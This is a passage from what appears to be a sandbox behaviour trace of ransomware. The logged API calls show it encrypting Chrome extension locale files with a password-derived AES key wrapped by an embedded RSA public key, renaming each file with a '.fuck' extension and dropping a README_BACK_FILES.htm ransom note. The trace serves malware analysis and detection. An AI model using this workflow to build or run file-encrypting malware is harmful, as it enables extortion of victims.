PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18468) returned 1 [0254.724] CryptEncrypt (in: hKey=0x2e18468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.724] CryptEncrypt (in: hKey=0x2e18468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17b68*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17b68*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.724] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e17b68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17b68*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.726] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xbb, lpOverlapped=0x0) returned 1 [0254.727] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xbb, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0254.727] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0254.728] CloseHandle (hObject=0x5d60) returned 1 [0254.728] CloseHandle (hObject=0x5d5c) returned 1 [0254.728] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0254.733] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0254.734] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0254.735] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0254.737] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0254.737] CryptDestroyKey (hKey=0x2e18828) returned 1 [0254.737] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.737] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.737] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.737] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0254.737] AreFileApisANSI () returned 1 [0254.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.737] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.738] GetFileType (hFile=0x5d50) returned 0x1 [0254.739] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.740] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.740] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18168 [0254.741] FindNextFileA (in: hFindFile=0x2e18168, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.741] FindNextFileA (in: hFindFile=0x2e18168, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.742] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.742] GetLastError () returned 0x0 [0254.742] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json")) returned 0x20 [0254.742] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json", dwFileAttributes=0x80) returned 1 [0254.743] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.744] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.746] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.749] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.749] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.749] CryptHashData (hHash=0x2e18828, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.749] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e184e8) returned 1 [0254.749] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.749] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.749] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e178c0) returned 1 [0254.750] CryptImportPublicKeyInfo (in: hCryptProv=0x2e178c0, dwCertEncodingType=0x1, pInfo=0x2990070*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29900a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29900a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e180a8) returned 1 [0254.750] CryptEncrypt (in: hKey=0x2e180a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.750] CryptEncrypt (in: hKey=0x2e180a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17d00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17d00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.750] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17d00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17d00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.752] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0254.753] CryptEncrypt (in: hKey=0x2e184e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0254.753] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0254.753] CloseHandle (hObject=0x5d5c) returned 1 [0254.753] CloseHandle (hObject=0x5d60) returned 1 [0254.753] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), bFailIfExists=0) returned 1 [0254.762] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json", dwFileAttributes=0x0) returned 1 [0254.762] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.gsg")) returned 1 [0254.763] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.fuck")) returned 1 [0254.764] CryptDestroyHash (hHash=0x2e18828) returned 1 [0254.764] CryptDestroyKey (hKey=0x2e184e8) returned 1 [0254.764] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.764] FindNextFileA (in: hFindFile=0x2e18168, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.764] FindClose (in: hFindFile=0x2e18168 | out: hFindFile=0x2e18168) returned 1 [0254.764] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\readme_back_files.htm")) returned 0xffffffff [0254.764] AreFileApisANSI () returned 1 [0254.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0254.765] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.765] GetFileType (hFile=0x5d50) returned 0x1 [0254.765] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.766] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.766] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.767] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.767] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.767] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.767] GetLastError () returned 0x0 [0254.767] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json")) returned 0x20 [0254.767] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json", dwFileAttributes=0x80) returned 1 [0254.767] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.768] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.769] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.769] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.771] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.771] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.771] CryptHashData (hHash=0x2e180e8, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.771] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.771] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.771] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.771] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e104f0) returned 1 [0254.772] CryptImportPublicKeyInfo (in: hCryptProv=0x2e104f0, dwCertEncodingType=0x1, pInfo=0x29906f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990720*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990728*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e184e8) returned 1 [0254.772] CryptEncrypt (in: hKey=0x2e184e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.772] CryptEncrypt (in: hKey=0x2e184e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10df8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10df8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.772] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e10df8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10df8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.774] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xac, lpOverlapped=0x0) returned 1 [0254.775] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xac, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0254.775] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0254.775] CloseHandle (hObject=0x5d60) returned 1 [0254.775] CloseHandle (hObject=0x5d5c) returned 1 [0254.775] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), bFailIfExists=0) returned 1 [0254.781] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json", dwFileAttributes=0x0) returned 1 [0254.781] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.gsg")) returned 1 [0254.783] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 